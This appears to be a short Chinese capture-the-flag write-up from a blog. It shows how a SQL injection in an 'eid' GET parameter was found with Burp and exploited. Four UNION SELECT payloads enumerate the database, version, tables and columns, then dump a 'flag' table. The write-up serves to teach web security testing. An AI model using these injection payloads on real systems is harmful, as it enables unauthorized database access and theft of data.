进来后看到如下页面,先试试能不能注册
点击register,成功注册
登录后,发现url有?q=1,尝试闭合,没发现注入点
打开burp抓包,发现有挺多get参数,一个一个尝试
试到eid的时候,发现存在字符注入点,而且有回显,可以用union联合查询,确定有5列
eid=5b141b8009cf0'+union+select+1,2,group_concat(database(),version()),4,5%23
eid=5b141b8009cf0'+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()%23
eid=5b141b8009cf0'+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name='flag'%23
eid=5b141b8009cf0'+union+select+1,2,group_concat(flag),4,5+from+flag%23
最后爆出flag
标签:group,23,union,云境,eid,2022,CVE,5b141b8009cf0,select From: https://www.cnblogs.com/dg05/p/17785835.html